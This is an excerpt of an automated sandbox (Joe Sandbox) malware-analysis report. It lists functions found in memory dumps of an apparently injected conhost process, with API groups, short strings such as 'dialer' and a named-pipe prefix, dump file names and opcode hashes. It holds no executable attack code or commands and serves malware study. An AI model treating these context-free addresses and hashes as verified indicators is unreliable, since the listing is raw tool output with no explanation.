                                                          Function 00000146F6B031CC Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: dialer
                                                          • API String ID: 756756679-3528709123
                                                          • Opcode ID: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction ID: 4081b65b10aa6e46d4b730783630a2825f9a0444fb3fc99b7a4f1a32f8f281f7
                                                          • Opcode Fuzzy Hash: b0319cbd86f06d073dcced0acdf6bc1c6042bb64f80e9fc0b828a3d11e191795
                                                          • Instruction Fuzzy Hash: D831C431721B52A2E754DF76F6683A96B90FB56B88F0850248ECC07B65EF34C87B8341
                                                          Function 00000146F6B0D3D0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0D3DF
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0D415
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0D442
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0D453
                                                          • FlsSetValue.KERNEL32(?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0D464
                                                          • SetLastError.KERNEL32(?,?,?,00000146F6B0DAE5,?,?,?,?,00000146F6B0DBA8), ref: 00000146F6B0D47F
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction ID: be8241214ecff8eae14612cf04ba84dc73276e59e1bf47fe6f9e81eaa164a6dd
                                                          • Opcode Fuzzy Hash: 7fc5e4c2f951738899047b95e00f4424a4026db9f78df7ad039e65ab4a94a20b
                                                          • Instruction Fuzzy Hash: CC11633032528061F954973177753ED2A916B4A7FCF146724ADBE476F6DA289C3B8203
                                                          Function 00000146F6B01934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction ID: 98f29aa7e5054571ba2971a85171dd2197181adc8c74e9f87833a4a8cf0165f6
                                                          • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                          • Instruction Fuzzy Hash: 0D016D31714A4096EB14DB62B5A839963A1F789FC8F488134DE8D43765EE3CC99BC741
                                                          Function 00000146F6B03B0C Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction ID: df0ee3cef39982fc7aa210a35120d66d6e039d937343159590aa72960a7f9cb8
                                                          • Opcode Fuzzy Hash: 8662155c9f7376030badf6deb1f9cc8df7edcdadcbb5a73039a50034e0df76dd
                                                          • Instruction Fuzzy Hash: 5B016D34621B4492EB259B31F86C79923A0BB4AB49F040528C98D46774EF3DC96EC702
                                                          Function 00000146F6AD8835 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction ID: 1f6b35a9d0d68322aa46315971d6771835e8d7068494a4f8879e5e9a0385bf88
                                                          • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction Fuzzy Hash: 5F51DF362122008AEB25CF35F464B983796F352BDCF1081A1DECA437A8DB35DD6AC702
                                                          Function 00000146F6B09435 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction ID: ad003fe22fcb01ce915ac49c68eb8e816938668d7b58fdca21f68b1f67411c67
                                                          • Opcode Fuzzy Hash: 911b6d09506e82739bdc666af230172d8f47b592f6a0b26bc0314746b579121d
                                                          • Instruction Fuzzy Hash: B451D536221701AADB14EB36F5247993B95F342B8DF11A020DB9E4379AEB35CD5AC701
                                                          Function 00000146F6AD8818 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                          • String ID: displacement map'$csm$f
                                                          • API String ID: 3242871069-3478954885
                                                          • Opcode ID: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction ID: 008bddb556d0092e0377e594e4234462f2c2c00787e1ef61c8790838cd8c164a
                                                          • Opcode Fuzzy Hash: 83240c1be95a85a2168ddca1a7ce1f874f475d626e55e81d58b9bdf2105a26fb
                                                          • Instruction Fuzzy Hash: A331AD3220164096E714DF22F864B993BAAF352BDCF158054EEDE037A5CB39CD6AC706
                                                          Function 00000146F6B09418 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                          • String ID: csm$f
                                                          • API String ID: 2395640692-629598281
                                                          • Opcode ID: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                          • Instruction ID: d78a5896d1254e70af6ea3a02e15ff3a07882ff892e8b1e037489ac3a1a11c8c
                                                          • Opcode Fuzzy Hash: cd5e78f7a824d61b6a4bd1de3076d2d48bd843f6231fa7e8b66aa639a396b76c
                                                          • Instruction Fuzzy Hash: FB31C435220741A6E724EF22F9647993B94F342B8CF05A014AEDE437A6DB38CD6AC705
                                                          Function 00000146F6B019D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction ID: cd33a85492edcac8cd4b86a101e09e060abf8368369994b3e381718b372163ab
                                                          • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                          • Instruction Fuzzy Hash: B3F0AF32324680A2EB308B34F5E439A6760F785B8CF845020DACD42564EE7CCAAECB01
                                                          Function 00000146F6B0330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CombinePath
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3422762182-91387939
                                                          • Opcode ID: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction ID: 5ae736b2629b7ac713addf57ffb69b1cb0873ce7a05c663ce18a9ddfdfd4fe8c
                                                          • Opcode Fuzzy Hash: e19f02f46d5f5175cba9bea6f0663c254bbceec99479fcaac31b51916b51a9ba
                                                          • Instruction Fuzzy Hash: 4BF0897032478091EA204B27B964199A651BB4DFC4F085030EE9E07738DF2CC96BC701
                                                          Function 00000146F6B0C0C8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction ID: 704a484ae3ff6636a57b22812343704bfad55ac1e5968dbae4e73cbe90daf0ac
                                                          • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction Fuzzy Hash: 75F06271321604A1EE108B34F8A83995330FB4A7A9F541215C6EE461F4DF3CC86ED301
                                                          Function 00000146F6B05500 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                          • Instruction ID: ce3e5a340b28ba34dfb5382e66257825f23a92809ef55249051b301fe51ea021
                                                          • Opcode Fuzzy Hash: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                          • Instruction Fuzzy Hash: 2F02EB3622CB8486D760CB65F5A439ABBA0F3C5794F105015EACE87B69DF7CC859CB01
                                                          Function 00000146F6B05B40 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                          • Instruction ID: f49f88ec219468046798eb801acbdd51567cd1a0aafb522fea58007a9fc25928
                                                          • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                          • Instruction Fuzzy Hash: 4761ED32129B4496E760CB25F66479ABBE0F38A788F501115EACD47BB4DB7CC859CF01
                                                          Function 00000146F6AE3934 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 8c266b06c706cc7fa8022ab1d05744c777aba39d606e61e16b1767b86428c3e0
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 0A117332A14E1141FA54157BF4763E91181AB7737CF454A34AAFE076FACF288C6F9206
                                                          Function 00000146F6B14534 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: e8b77affa320c937df7277b01b18f038b663882237b99e69fb74665e4ed23667
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: FF118232A30A1121FA541378F4763E911816B5B37CF584634ABFE466FADB688C6F4303
                                                          Function 00000146F6B0AE4C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction ID: dfe7db06bc1ce74b2971c940f18112277ff0195f7b7d7de5b9bb9b34fbe9b83b
                                                          • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction Fuzzy Hash: D9617A73610B449AE7208F65E5403DD7BA0F346B8CF145615EE8D13BAADB38C8AAC701
                                                          Function 00000146F6ADA5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000003.2254610774.00000146F6AD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000146F6AD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_3_146f6ad0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: 7d9965c5958a57982f8946a5edeae17a06e8b29f21e0d8387158f4eb5ee734e9
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: 61517D32100280D6EB648F35E46439877A2F756B98F144115DFDD87BE9EB38D87ACB02
                                                          Function 00000146F6B0B1A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: 9d38800803987caae89d804f5a7eabc448c2ca3ce8211e2e8ba6acd2dba4b357
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: D6516232120340E6EB748B35B66439C7E90E757B88F146215DBDE87BE5CB39D86AC702
                                                          Function 00000146F6B03554 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
                                                          • Associated: 00000044.00000002.2378064668.00000146F6B00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378118498.00000146F6B16000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378141512.00000146F6B21000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378169606.00000146F6B23000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000044.00000002.2378191960.00000146F6B29000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_68_2_146f6b00000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction ID: fcc9d5a5d6a5f5c19fb5f22cebab2539d87c4b39c5f1fb1b8c0b793391034ac5
                                                          • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction Fuzzy Hash: EC115431328742B1EB609735F9293DA5AA4F746788F9051219ECD837B5EF28CD2EC741
                                                          Function 00000146F6B12488 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
